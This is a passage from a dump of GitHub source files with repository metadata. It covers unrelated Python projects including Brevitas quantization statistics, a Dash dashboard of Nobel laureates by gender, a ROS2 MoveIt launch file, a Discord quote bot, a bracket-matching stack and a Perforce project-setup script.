range(num_quantized_bins // 2, self.num_bins // 2 + 1):\n p_bin_idx_start = self.num_bins // 2 - i\n p_bin_idx_stop = self.num_bins // 2 + i + 1\n thresholds[i - num_quantized_bins // 2] = hist_edges[p_bin_idx_stop]\n sliced_nd_hist = hist[p_bin_idx_start:p_bin_idx_stop]\n p = sliced_nd_hist.clone()\n left_outlier_count = torch.sum(hist[0:p_bin_idx_start])\n p[0] += left_outlier_count\n right_outlier_count = torch.sum(hist[p_bin_idx_stop:])\n p[-1] += right_outlier_count\n is_nonzeros = (sliced_nd_hist != 0).float()\n num_merged_bins = torch.numel(p) // num_quantized_bins\n for j in range(num_quantized_bins):\n start = j * num_merged_bins\n stop = start + num_merged_bins\n quantized_bins[j] = sliced_nd_hist[start:stop].sum()\n quantized_bins[-1] += sliced_nd_hist[num_quantized_bins * num_merged_bins:].sum()\n q = torch.zeros_like(p, dtype=torch.float32, device=x.device)\n for j in range(num_quantized_bins):\n start = j * num_merged_bins\n if j == num_quantized_bins - 1:\n stop = -1\n else:\n stop = start + num_merged_bins\n norm = is_nonzeros[start:stop].sum()\n if norm != 0:\n q[start:stop] = quantized_bins[j] / norm\n q[sliced_nd_hist == 0] = 0.\n p = self.smooth_normalize_distribution(p, self.smoothing_eps)\n q = self.smooth_normalize_distribution(q, self.smoothing_eps)\n if q is None:\n divergence[i - num_quantized_bins // 2] = float('inf')\n else:\n divergence[i - num_quantized_bins // 2] = torch.distributions.kl.kl_divergence(p, q)\n min_divergence_idx = torch.argmin(divergence)\n opt_threshold = thresholds[min_divergence_idx]\n return opt_threshold\n\n\nclass L1Norm(brevitas.jit.ScriptModule):\n \"\"\"ScriptModule implementation to collect per-channel L1 normalization stats\n for weight normalization-based quantization.\"\"\"\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: Optional[int] = None) -> None:\n super(L1Norm, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n # Need to be able to return the max per-channel L1 norm as a scalar\n raise NotImplementedError(\"L1 normalization is not supported per-tensor yet.\")\n else:\n return x.norm(p=1, dim=self.stats_reduce_dim, keepdim=True)\n\n\nclass L2Norm(brevitas.jit.ScriptModule):\n \"\"\"ScriptModule implementation to collect per-channel L2 normalization stats\n for weight normalization-based quantization.\"\"\"\n __constants__ = ['stats_reduce_dim']\n\n def __init__(self, stats_reduce_dim: Optional[int] = None) -> None:\n super(L2Norm, self).__init__()\n self.stats_reduce_dim = stats_reduce_dim\n\n @brevitas.jit.script_method\n def forward(self, x: Tensor):\n if self.stats_reduce_dim is None:\n # Need to be able to return the max per-channel L2 norm as a scalar\n raise NotImplementedError(\"L2 normalization is not supported per-tensor yet.\")\n else:\n return x.norm(p=2, dim=self.stats_reduce_dim, keepdim=True)\n","repo_name":"Xilinx/brevitas","sub_path":"src/brevitas/core/stats/stats_op.py","file_name":"stats_op.py","file_ext":"py","file_size_in_byte":15821,"program_lang":"python","lang":"en","doc_type":"code","stars":963,"dataset":"github-code","pt":"2"} +{"seq_id":"28431169987","text":"'''\ndef oszegzo(x, y):\n return x + y\n\n\nprint(oszegzo(9231239999, -1213123143))\n'''\nlist = [1, 6, 5]\ndef paros_E(x, *args):\n T = False\n for szam in list:\n if szam % 2 == 0:\n T = True\n if T:\n print(\"PÁÁÁROS\")\nparos_E(list)\n\n\n","repo_name":"kizsi2019/22_10D2","sub_path":"Uivárosi Gábriel/füg1.py","file_name":"füg1.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"43208359323","text":"import serial\n\nser = serial.Serial(port='/dev/ttyS0',baudrate=9600,parity=serial.PARITY_ODD,stopbits=serial.STOPBITS_TWO,bytesize=serial.SEVENBITS)\n\nif ser.isOpen():\n print('Opened!')\nelse:\n print('Closed!')\nser.close()\n\ncommand = input('Enter with a command\\n 1 - Open Shutter\\n 2 - Close Shutter\\n 3 - Get out\\n')\n\nif command == '1':\n print(\"Shutter Opened!\")\nif command == '2':\n print('Shutter Closed!')\nif command == '3':\n exit()\n\n","repo_name":"Blitzcranklenda/PySerial","sub_path":"#Shutter - Port Serial.py","file_name":"#Shutter - Port Serial.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"8960255792","text":"#!/usr/bin/env python\n# _*_ coding: utf-8 _*_\n# @author : mythwind \n# contact : 774202013@qq.com\n# @datetime : 2020/3/9 9:30 上午 \n# @File : pca_algorithm_demo.py\n# @desc :\nfrom utils import file_utils\nfrom utils import math_utils\nfrom pca import pca_algorithm\nimport numpy as np\n\n\ndef test_data():\n data_mat = file_utils.load_map_datamat(\"assets/testSet.txt\")\n lowd_mat, recon_mat = pca_algorithm.pca_dimen_reduce(data_mat, 1)\n print(np.shape(data_mat))\n print(np.shape(lowd_mat))\n pca_algorithm.plot_datamat(data_mat, lowd_mat, recon_mat)\n\ndef test_secom() :\n data_mat = file_utils.load_map_datamat(\"assets/secom.data\", ' ')\n data_mat = math_utils.replace_nan_with_mean(data_mat)\n pca_algorithm.show_secom_data(data_mat)\n\n\nif __name__ == '__main__':\n test_data()\n test_secom()\n","repo_name":"mythwind/machine-learning-python3","sub_path":"venv/src/machine/pca/pca_algorithm_demo.py","file_name":"pca_algorithm_demo.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"72272548848","text":"from PyQt5.Qt import *\nimport sys\n\napp = QApplication(sys.argv)\n\nwindow = QWidget()\nwindow.setWindowTitle(\"hahahahah\")\nwindow.resize(500, 500)\n\nbut = QPushButton(QIcon(\"./logo.png\"), \"button\", window)\n\nbut1 = QPushButton(QIcon(\"./logo.png\"), \"button1\", window)\nbut1.move(0, 60)\nbut1.pressed.connect(lambda: print(\"默认按钮\"))\n\n# but1.setAutoDefault(True) #设置默认按钮,选择了之后就会高亮显示,用enter和空格键可以控制\nprint(but1.autoDefault())\n\nbut1.setDefault(True) # 设置默认按钮,用enter和空格键可以控制\nprint(but1.isDefault())\n\nwindow.show()\n\n# but.showMenu() #打开时打开菜单\nsys.exit(app.exec_())\n","repo_name":"guanzejie/PyQt_Note","sub_path":"PyQt_31_QAPushButton_设置默认按钮.py","file_name":"PyQt_31_QAPushButton_设置默认按钮.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9296191142","text":"# from turtle import tilt, title\nfrom pydoc import classname\nimport pandas as pd\nimport json\nfrom dash import Dash, html, dcc, Input, Output\nimport plotly.express as px\nimport plotly.graph_objects as go\nimport numpy as np\nimport requests\n\napp = Dash(__name__)\n\n# reading the data from json file for prize winners\nfile = open('./laureate.json')\nlaureates = json.load(file)['laureates']\nfile.close()\n\n# reading the data from json file for country code\nfile = open('./country.json')\ncountries = json.load(file)['countries']\nfile.close()\n\n# result = requests.get('https://api.nobelprize.org/v1/laureate.json')\n# laureates = result.json()['laureates']\n\n# result = requests.get('http://api.nobelprize.org/v1/country.json')\n# country = result.json()['countries']\n\n\n# making it into a dataframe\nlaureates = pd.DataFrame(laureates)\ncountries = pd.DataFrame(countries)\n\n# converting to a datframe of required datas\nname = []\ncountry = []\ndiedCountry = []\ngender = []\nprizeYear = []\nprizeCategory = []\n\nfor i,item in laureates.iterrows():\n for j in item['prizes']:\n if pd.isna(item['surname']) :\n name.append(item['firstname'])\n else:\n name.append(item['firstname']+' '+item['surname'])\n \n if pd.isna(item['bornCountryCode']):\n country.append('International')\n else:\n country.append(countries[countries['code'] == item['bornCountryCode']].name.iloc[0])\n\n gender.append(item['gender'])\n prizeYear.append(j['year'])\n prizeCategory.append(j['category'])\n\ndf = pd.DataFrame({\n 'name':name,\n 'country':country,\n 'gender':gender,\n 'prizeYear':prizeYear,\n 'prizeCategory':prizeCategory\n}).sort_values(by='prizeYear').reset_index(drop=True)\n\n# adding count column to use scatter plot to make dot matrix plot\ncountArr = []\ncount = -1\ntemp = 0\nfor i in range(len(df)):\n if df['prizeYear'].iloc[i] != temp:\n count = -1\n temp = df['prizeYear'].iloc[i]\n\n count = count + 1\n countArr.append(count)\ndf['count'] = countArr\n\n# scatter graph\nscatter_fig = px.scatter(df, x='prizeYear', y='count', color='gender', symbol='gender', hover_name='name')\nscatter_fig.update_layout(\n xaxis_title=\"Years\",\n yaxis_title=\"Number of Winners\",\n legend_title=\"Gender\",\n font=dict(\n family=\"Courier New, monospace\",\n size=14,\n color=\"RebeccaPurple\"\n )\n)\n\n# histogram graph\nhistogram_fig = px.histogram(df, x='prizeCategory', color='gender')\nhistogram_fig.update_layout(\n xaxis_title=\"Prize Category\",\n yaxis_title=\"Number of Winners\",\n legend_title=\"Gender\",\n font=dict(\n family=\"Courier New, monospace\",\n size=14,\n color=\"RebeccaPurple\"\n )\n)\n\n# preparing cummulative data\nmale = df[df['gender']=='male']\nfemale = df[df['gender']=='female']\norg = df[df['gender']=='org']\n\nmale = male.groupby('prizeYear')['count'].count().reset_index()\nmaleYear = male['prizeYear']\nmaleCummSum = np.array(male['count']).cumsum()\n\nfemale = female.groupby('prizeYear')['count'].count().reset_index()\ntempYear = []\ntempCount = []\nfor i,item in male.iterrows():\n if len(female[female['prizeYear'] == item['prizeYear']]) == 0:\n tempYear.append(item['prizeYear'])\n tempCount.append(0)\n else:\n tempYear.append(female[female['prizeYear'] == item['prizeYear']].iloc[0]['prizeYear'])\n tempCount.append(female[female['prizeYear'] == item['prizeYear']].iloc[0]['count'])\nfemale = pd.DataFrame({'prizeYear':tempYear, 'count':tempCount})\nfemaleYear = female['prizeYear']\nfemaleCummSum = np.array(female['count']).cumsum()\n\norg = org.groupby('prizeYear')['count'].count().reset_index()\ntempYear = []\ntempCount = []\nfor i,item in male.iterrows():\n if len(org[org['prizeYear'] == item['prizeYear']]) == 0:\n tempYear.append(item['prizeYear'])\n tempCount.append(0)\n else:\n tempYear.append(org[org['prizeYear'] == item['prizeYear']].iloc[0]['prizeYear'])\n tempCount.append(org[org['prizeYear'] == item['prizeYear']].iloc[0]['count'])\norg = pd.DataFrame({'prizeYear':tempYear, 'count':tempCount})\norgYear = org['prizeYear']\norgCummSum = np.array(org['count']).cumsum()\n\n# line graph\nline_fig = go.Figure()\nline_fig.add_trace(go.Scatter(x=maleYear, y=maleCummSum, name='Male'))\nline_fig.add_trace(go.Scatter(x=femaleYear, y=femaleCummSum, name='Female'))\nline_fig.add_trace(go.Scatter(x=orgYear, y=orgCummSum, name='Org'))\n\nline_fig.update_layout(\n xaxis_title=\"Years\",\n yaxis_title=\"Number of Winners\",\n legend_title=\"Gender\",\n font=dict(\n family=\"Courier New, monospace\",\n size=14,\n color=\"RebeccaPurple\"\n )\n)\n\n\n# default\ntab1_fig = scatter_fig\n\n# female percentage\nfp = (len(df[df['gender']=='female'])/len(df))*100\n\napp.layout = html.Div(children=[\n \n html.Div(className='heading',children=[\n html.H1(children='Noble Laueretes'),\n html.P(children='A Quick Look at Nobel Prize winners till now based on Gender')\n ]),\n\n dcc.Tabs(id='tabGroup',children=[\n dcc.Tab(\n label='Over the Years',\n children=[\n html.Div(className='subHeading',children=[\n html.H2(children='Winners over the Years based on Gender'),\n html.P(children=[\n html.Span(children='*'),\n 'Gender contains male, female or Organization'\n ])\n ]),\n\n html.Div(className='insight',children=[\n html.H4(children='Few Insights:'), \n html.Ul(children=[\n html.Li(children=f'Only {str(fp)[:4]}% of winners are women!'),\n html.Li(children='Marie Curie is the first woman to Nobel Prize'),\n html.Li(children='Red cross is the only Organization to win Nobel Prize 3 times in 1917, 1944 and 1963')\n\n ])\n \n ]),\n\n html.Div(id='scatter-plot',children=[\n dcc.Dropdown(['Normal','Cumulative'], 'Normal', id='tab1_dropDown'),\n dcc.Graph(\n id='tab1-grpah',\n figure=tab1_fig\n )\n ]),\n\n ]\n ),\n dcc.Tab(\n label='In different Categories',\n children=[\n html.Div(className='subHeading',children=[\n html.H2(children='Winners in different Categories based on Gender'),\n html.P(children=[\n html.Span(children='*'),\n 'Gender contains male, female or Organization'\n ])\n ]),\n\n html.Div(className='insight',children=[\n html.H4(children='Few Insights:'), \n html.Ul(children=[\n html.Li(children='The Physics and the Economics Prizes has only 2% women Winners.'),\n html.Li(children='There are 224 Nobel Prize winners for Medicine')\n ])\n \n ]),\n\n dcc.Graph(\n id='histogram-plot',\n figure=histogram_fig\n )\n\n ]\n )\n ])\n \n])\n\n\n\n@app.callback(\n Output('tab1-grpah','figure'),\n Input('tab1_dropDown', 'value')\n)\ndef updateGraph(value):\n if value == 'Normal':\n tab1_fig = scatter_fig\n else:\n tab1_fig = line_fig\n \n return tab1_fig\n\n\n\nif __name__ == '__main__':\n \n app.run_server(debug=False, port=8050) \n ","repo_name":"thomasdevasia/DAV_21099593","sub_path":"python/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"10061724792","text":"import os\nfrom ament_index_python import get_package_share_directory\nfrom launch import LaunchDescription\nfrom launch.actions import DeclareLaunchArgument, IncludeLaunchDescription\nfrom launch.substitutions import Command, FindExecutable, LaunchConfiguration, PathJoinSubstitution\nfrom launch_ros.actions import Node\nfrom launch_ros.substitutions import FindPackageShare\nfrom launch.actions import IncludeLaunchDescription\nfrom launch.launch_description_sources import PythonLaunchDescriptionSource\nimport launch_ros\n\nfrom launch.actions import TimerAction\nfrom launch.conditions import IfCondition\n\nfrom moveit_configs_utils.launch_utils import (\n DeclareBooleanLaunchArg,\n)\nfrom moveit_configs_utils import MoveItConfigsBuilder\n\n\ndef generate_launch_description():\n moveit_config = MoveItConfigsBuilder(\n \"prbt\", package_name=\"prbt_robot_moveit_config\"\n ).to_moveit_configs()\n declared_arguments = []\n \n declared_arguments.append(\n DeclareLaunchArgument(\n \"can_interface\",\n default_value=\"can0\",\n description=\"Interface name for can\",\n )\n )\n \n robot_hw_node = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n [PathJoinSubstitution([FindPackageShare(\"prbt_robot_support\"), \"launch\", \"robot.launch.py\"])],\n ),\n launch_arguments={\n \"can_interface\": LaunchConfiguration(\"can_interface\"),\n \"use_ros2_control\": \"true\",\n }.items(),\n )\n\n # todo: remove this once joint_state_broadcast from controller is fixed\n state_publisher = Node(\n package=\"joint_state_publisher\",\n name=\"joint_state_publisher\",\n executable=\"joint_state_publisher\",\n parameters=[{\n \"source_list\": [\n \"/prbt_joint_1/joint_states\",\n \"/prbt_joint_2/joint_states\",\n \"/prbt_joint_3/joint_states\",\n \"/prbt_joint_4/joint_states\",\n \"/prbt_joint_5/joint_states\",\n \"/prbt_joint_6/joint_states\",\n \"/prbt_joint_7/joint_states\",\n ],\n \"rate\": 10\n }]\n )\n\n virtual_joints = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n str(\n moveit_config.package_path / \"launch/static_virtual_joint_tfs.launch.py\"\n )\n ),\n )\n\n # Given the published joint states, publish tf for the robot links\n\n move_group = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n str(moveit_config.package_path / \"launch/move_group.launch.py\")\n ),\n )\n\n spawn_controllers = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n str(moveit_config.package_path / \"launch/spawn_controllers.launch.py\")\n ),\n )\n\n # Run Rviz and load the default config to see the state of the move_group node\n\n rviz = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n str(moveit_config.package_path / \"launch/moveit_rviz.launch.py\")\n ),\n )\n\n # If database loading was enabled, start mongodb as well\n db = IncludeLaunchDescription(\n PythonLaunchDescriptionSource(\n str(moveit_config.package_path / \"launch/warehouse_db.launch.py\")\n ),\n )\n\n node_list = [\n robot_hw_node,\n #state_publisher,\n TimerAction(\n period=10.0,\n actions=[virtual_joints]\n ),\n # TimerAction(\n # period=12.0,\n # actions=[spawn_controllers]\n # ),\n TimerAction(\n period=15.0,\n actions=[move_group]\n ),\n TimerAction(\n period=20.0,\n actions=[rviz]\n )\n ]\n\n return LaunchDescription(declared_arguments + node_list)\n\n ","repo_name":"ipa-cmh/prbt_robot","sub_path":"prbt_robot_moveit_config/launch/moveit_planning_execution.launch.py","file_name":"moveit_planning_execution.launch.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"39977467745","text":"import discord\nimport os\nfrom magnuswebserver import keep_alive\nimport discord,random,asyncio\nfrom discord.ext import commands\nfrom discord.ext import tasks, commands\nimport requests\nimport json\n\nmagnus = discord.Client()\n\ndef get_quote():\n response = requests.get(\"https://zenquotes.io/api/random\")\n json_data = json.loads(response.text)\n quote = \"\\\"\" + json_data[0][\"q\"] + \"\\\" - \" + json_data[0][\"a\"]\n return quote\n\n# use client.event decorator to register an event. In the discord.py library, things are done with \"call backs\".\n\n@magnus.event\nasync def on_ready(): \n \"\"\"Calls when the bot is ready for use\"\"\"\n await magnus.change_presence(activity=discord.Game(name=\"Chess\"))\n sendmessage.start()\n sendmessage1.start()\n \n print(\"Bot has logged in as {0.user}\".format(magnus))\n\n@magnus.event\nasync def on_message(message):\n \"\"\"Calls each time a message is received\"\"\"\n if message.author == magnus.user: # If the message is from the bot itself, do nothing.\n return\n\n if message.content.startswith(\"$himagnus\"): # We use say that \"$info\" in a bot command for Carlsen Bot\n await message.channel.send(\"Hello! My name is Magnus Carlsen, and I'm here to explain the rules of this Discord Server! Please type \\\"$rules\\\" for more information!\")\n\n if message.content.startswith(\"$rules\"):\n await message.channel.send(\" The rules are very simple: \\n - Please be respectful. \\n - Please follow Lagno's list of rules \\n That's all!\")\n\n if message.content.startswith(\"$merrychristmas\"):\n await message.channel.send(\"Merry Christmas Everyone!\")\n\n@tasks.loop(seconds=196400)\nasync def sendmessage():\n channel = magnus.get_channel(890990298585497687)\n quote = get_quote()\n await channel.send(quote)\n\n@tasks.loop(seconds=143200)\nasync def sendmessage1():\n channel = magnus.get_channel(905136842599432223)\n await channel.send(\"-puzzle\", delete_after=10)\n\n\n# Run the bot script (inside the parameter for the run() function we need to put our token for the bot (bot token))\nkeep_alive()\n\n\n# We can use an \"Environment Variable\"\nmagnus_token = os.environ['magnus']\nmagnus.run(magnus_token)\n\n# Setting `Playing ` status\n# await bot.change_presence(activity=discord.Game(name=\"a game\"))\n\n# Setting `Streaming ` status\n# await bot.change_presence(activity=discord.Streaming(name=\"My Stream\", url=my_twitch_url))\n\n# Setting `Listening ` status\n# await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.listening, name=\"a song\"))\n\n# Setting `Watching ` status\n# await bot.change_presence(activity=discord.Activity(type=discord.ActivityType.watching, name=\"a movie\"))\n\n\n\"\"\"\n\n@tasks.loop(seconds=40) # How often the bot should change status, mine is set on every 40 seconds\nasync def changepresence():\n global x\n\n game = iter(\n [\n \"Status 1\",\n \"Status 2\",\n \"Status 3\",\n \"Status 4\",\n \"Status 5?\",\n \"Status 6\",\n ]\n ) # Every line above ^^ is one new status the bot can have\n for x in range(random.randint(1, 6)): # Here you write the total of different status you have for the bot, I have 6 and that's why I have number 6 there. This makes it a 16.666% chance to change status every 40 second\n x = next(game)\n await bot.change_presence(activity=discord.Game(name=x))\n\n\"\"\"\n\n","repo_name":"alanknguyen314/discordbots","sub_path":"carlsenbot.py","file_name":"carlsenbot.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"24383319764","text":"class Stack:\n def __init__(self, my_string):\n self.my_list = LinkedList()\n self.my_string = my_string\n \n \n def checkBalance(self):\n curr_position = position_first_open = 0\n open = ['(', '[', '{']\n close = [')', ']', '}'] \n \n for char in self.my_string:\n curr_position += 1\n if char in open:\n if self.my_list.empty():\n position_first_open = curr_position\n self.my_list.pushTop(char)\n elif char in close:\n print(\"In remove with \" + char)\n if char == ')' and self.my_list.getTop() != '(':\n print (str(curr_position) + \" : \" + char + \" : \" + self.my_list.getTop())\n exit()\n elif char == ']' and self.my_list.getTop() != '[':\n print (str(curr_position) + \" : \" + char + \" : \" + self.my_list.getTop())\n exit()\n elif char == '}' and self.my_list.getTop() != '{':\n print (str(curr_position) + \" : \" + char + \" : \" + self.my_list.getTop())\n exit()\n else:\n self.my_list.popTop() \n if self.my_list.empty() is not True:\n print (\"Checking if list is empty...\") \n print (self.my_list.empty())\n \n else:\n print ('Success') \n self.my_list.printLinkedList() \n\n\nclass LinkedList:\n \n def __init__(self):\n self.head = self.tail = None\n \n def empty(self):\n if self.head is None:\n return True\n else:\n return False \n \n def pushTop(self, item):\n newNode = Node(item, None) \n #print('New node created: ' + item )\n if self.head is None: # if linked list is empty\n self.head = newNode\n self.tail = newNode\n print('New node added to stack: ' + item )\n else:\n newNode.next = self.head\n self.head = newNode\n print('New node added to stack: ' + item ) \n \n def getTop(self):\n return self.head.value\n \n \n def popTop(self):\n if self.head is not None: # if linked list is not empty\n top = self.head\n if top.next is not None: # check if there is next Node in list\n self.head = top.next\n else: # reset linked list to empty state if no next Node\n self.head = None\n self.tail = None\n print('New node removed from stack: ' + top.value) \n return top \n else:\n return None\n\n def printLinkedList(self):\n if self.empty:\n print(\"List is empty\")\n else:\n curr_node = self.head\n while (curr_node is not None):\n print (curr_node.value)\n if curr_node.next is None:\n break\n else:\n curr_node = curr_node.next \n \n '''No further operations need to be implemented on LinkedList in order\n to perform as a Stack...''' \n \n \nclass Node:\n def __init__(self, value, next):\n self.value = value\n self.next = next\n \n\n \nif __name__ == '__main__':\n s1 = '{}[]'\n s2 = '[]'\n s3 = '{}[]' \n s4 = '[()]'\n s5 = '(())'\n s6 = '{[]}()'\n s7 = '{{{('\n s8 = '{[}'\n s9 = 'foo(bar);' \n s10 = 'foo(bar[i);' \n my_stack = Stack(s6)\n my_stack.checkBalance()\n \n \n\n\n\n\n\n","repo_name":"susieagerholm/PythonDataStructures","sub_path":"Stack.py","file_name":"Stack.py","file_ext":"py","file_size_in_byte":3376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"18714674791","text":"from pathlib import PurePosixPath\nfrom pprint import pprint\n\nfrom P4 import P4\n\n# from random_word import RandomWords\n\nTEMPLATE_DEPOT_NAME = \"template\"\nTEMPLATE_BRANCH_VIEW = [\n '\"{template_folder_path}/...\" \"{dev_folder_path}/...\"',\n '\"{template_rs_path}\" \"{dev_folder_path}/{new_rs_filename}\"',\n '\"{template_uproject_path}\" \"{dev_folder_path}/{new_uproject_filename}\"',\n]\n\np4 = P4()\np4.connect()\n\n\ndef main():\n branch_map = p4.fetch_branch(\"test\")\n project_name = validate_input(\"Enter name for new project: \", lambda x: len(x) > 2)\n depot_name = create_depot(project_name)\n stream = select_stream(f\"//{TEMPLATE_DEPOT_NAME}/...\")\n uproject_path = select_uproject(stream)\n prod_stream_spec, dev_stream_spec = create_streams(\n depot_name, stream[\"Stream\"], project_name\n )\n branch_map = make_branch_map(uproject_path, dev_stream_spec, project_name)\n populate_new_streams(branch_map, dev_stream_spec, project_name)\n delete_branch_map(branch_map)\n\n\ndef select_stream(depot_path: str):\n streams = p4.run_streams(depot_path)\n print(\"Select which template stream by number:\")\n for i, stream in enumerate(streams):\n print(f\"{i+1}: {stream['Stream']} - {stream['desc'].strip()}\")\n selection = validate_input(\"> \", lambda x: int(x) > 0 and int(x) <= len(streams))\n return streams[int(selection) - 1]\n\n\ndef select_uproject(stream: dict):\n files = p4.run_files(f'{stream[\"Stream\"]}/....uproject')\n for i, file in enumerate(files):\n print(f\"{i+1}: {file['depotFile']}\")\n selection = validate_input(\"> \", lambda x: int(x) > 0 and int(x) <= len(files))\n return files[int(selection) - 1]\n\n\ndef create_depot(project_name: str):\n # Get a depot-friendly name!\n depot_name = f'prj-{project_name.lower().replace(\" \", \"-\")}'\n if depot_exists(depot_name):\n print(\n f\"A depot already exists with the name {depot_name}.\"\n \"\\nEnter 'y' to use this existing depot. Anything else to abort.\"\n )\n resp = input(\"> \").strip()\n if resp == \"y\":\n return depot_name\n raise Exception(\"Aborting... Depot already exists.\")\n depot = p4.fetch_depot(\"-t\", \"stream\", depot_name)\n depot[\"Description\"] = f\"The depot for Project {project_name}.\"\n p4.save_depot(depot)\n\n # Get a depot-friendly name!\n print(f\"Depot {depot_name} successfully created!\")\n return depot_name\n\n\ndef depot_exists(depot_name):\n return depot_name.lower() in [depot[\"name\"].lower() for depot in p4.run_depots()]\n\n\ndef create_streams(depot_name: str, template_stream: str, project_name: str):\n prod_stream_spec = create_mainline_stream(\n depot_name, template_stream, \"prod\", project_name\n )\n dev_stream_spec = create_development_stream(\n depot_name, prod_stream_spec, \"dev\", project_name\n )\n return prod_stream_spec, dev_stream_spec\n\n\ndef create_mainline_stream(\n depot_name: str, from_stream: str, stream_name: str, project_name: str\n):\n from_stream_spec = p4.run_stream(\"-o\", from_stream)[0]\n new_stream_spec = p4.fetch_stream(f\"//{depot_name}/{stream_name}\")\n new_stream_spec[\"Type\"] = \"mainline\"\n new_stream_spec[\"Paths\"] = from_stream_spec[\"Paths\"]\n new_stream_spec[\"Ignored\"] = from_stream_spec.get(\"Ignored\", [])\n new_stream_spec[\"Remapped\"] = from_stream_spec.get(\"Remapped\", [])\n new_stream_spec[\n \"Description\"\n ] = f\"The production stream for Project {project_name}.\"\n p4.save_stream(new_stream_spec)\n print(f\"Created stream {new_stream_spec['Name']} at {new_stream_spec['Stream']}\")\n return new_stream_spec\n\n\ndef create_development_stream(\n depot_name: str, parent_stream: dict, stream_name: str, project_name: str\n):\n new_stream_spec = p4.fetch_stream(f\"//{depot_name}/{stream_name}\")\n new_stream_spec[\"Parent\"] = parent_stream[\"Stream\"]\n new_stream_spec[\n \"Description\"\n ] = f\"The development stream for Project {project_name}.\"\n p4.save_stream(new_stream_spec)\n print(f\"Created stream {new_stream_spec['Name']} at {new_stream_spec['Stream']}\")\n return new_stream_spec\n\n\ndef make_branch_map(\n template_project: dict,\n development_stream: dict,\n project_name: str,\n):\n branch_map = p4.fetch_branch(f\"branch_map_{project_name.lower().replace(' ', '_')}\")\n # first is just the folder name\n template_uproject_path = PurePosixPath(template_project[\"depotFile\"])\n template_folder_path = template_uproject_path.parent\n template_rs_path = (\n f\"{template_uproject_path.parent}/rs_{template_uproject_path.stem.lower()}.json\"\n )\n dev_folder_path = f'{development_stream[\"Stream\"]}/Project {project_name}'\n new_uproject_filename = f'Project_{project_name.replace(\" \", \"_\")}.uproject'\n new_rs_filename = f'rs_project_{project_name.lower().replace(\" \", \"_\")}.json'\n\n branch_map[\"View\"] = [\n view.format(\n template_folder_path=template_folder_path,\n dev_folder_path=dev_folder_path,\n template_rs_path=template_rs_path,\n template_uproject_path=template_uproject_path,\n new_rs_filename=new_rs_filename,\n new_uproject_filename=new_uproject_filename,\n )\n for view in TEMPLATE_BRANCH_VIEW\n ]\n\n p4.save_branch(branch_map)\n print(f\"Created branch map {branch_map['Branch']}\")\n return branch_map[\"Branch\"]\n\n\ndef delete_branch_map(branch_map: str):\n p4.run_branch(\"-d\", branch_map)\n print(f\"Deleted branch mapping {branch_map}\")\n\n\ndef populate_new_streams(branch_map, dev_stream_spec, project_name):\n print(\n f\"Populating with initial template for Project {project_name} into dev stream...\"\n )\n p4.run_populate(\n \"-d\",\n f\"Populating with initial template for Project {project_name} into dev stream\",\n \"-b\",\n branch_map,\n )\n print(\n f\"Populating with initial template for Project {project_name} into prod stream...\"\n )\n p4.run_populate(\n \"-d\", \"Populating prod stream from dev stream\", \"-S\", dev_stream_spec[\"Stream\"]\n )\n\n\ndef validate_input(prompt: str, validation_function=lambda x: True):\n while True:\n resp = input(prompt)\n try:\n if validation_function(resp):\n return resp\n except Exception as e:\n print(\"Invalid input: \", e)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"vertigojc/p4pythonic","sub_path":"jase_scratchpad.py","file_name":"jase_scratchpad.py","file_ext":"py","file_size_in_byte":6361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14650273089","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter.font import BOLD\nfrom PIL import Image, ImageTk\nfrom ErrorTest import resetFileBox, showError\nfrom filePrompt import showPrompt\nfrom Data_Cleaning_wPandas_Purch import processFile\n#from SortingOptions import process\nimport sys\nimport os\nimport pathlib\nimport subprocess\nimport time\n\n\n\nclass promptWindow(tk.Toplevel):\n \n def __init__(self, label_file_explorer, saveAs, pickList):\n super().__init__() \n \n self.focus_set()\n self.grab_set_global()\n\n root_dir = \"C:/Users/tbrasher/Documents/PurchBuilder/\"\n\n\n def resource_path(relative_path):\n try:\n #print('directory = ', os.getenv())\n #print('base path = ', base_path)\n base_path = getattr(sys,'_MEIPASS', os.getcwd())\n return os.path.join(base_path, relative_path)\n \n except Exception:\n #print('current directory = ', pathlib.Path(__file__).parent.resolve())\n base_path = pathlib.Path(__file__).parent.resolve()\n #print('abs path = ', base_path)\n return os.path.join(base_path, relative_path)\n\n \n title = tk.Text(self, font= (\"Arial 10 bold\"), background=\"light gray\",\n padx=120.5, pady=2.5, width = 8, height = 1)\n title.insert(\"1.0\", \"Message\")\n title.configure(state=\"disabled\")\n title.place(x=2.5, y=2.5)\n \n \n\n #f = tk.Frame(width = 300, height = 150)\n self.c = tk.Canvas(self, bg= \"white\", width = 300, height =125)\n self.c.pack() \n \n #image = Image.open(root_dir+\"/Files/Logos/background.png\")\n image = 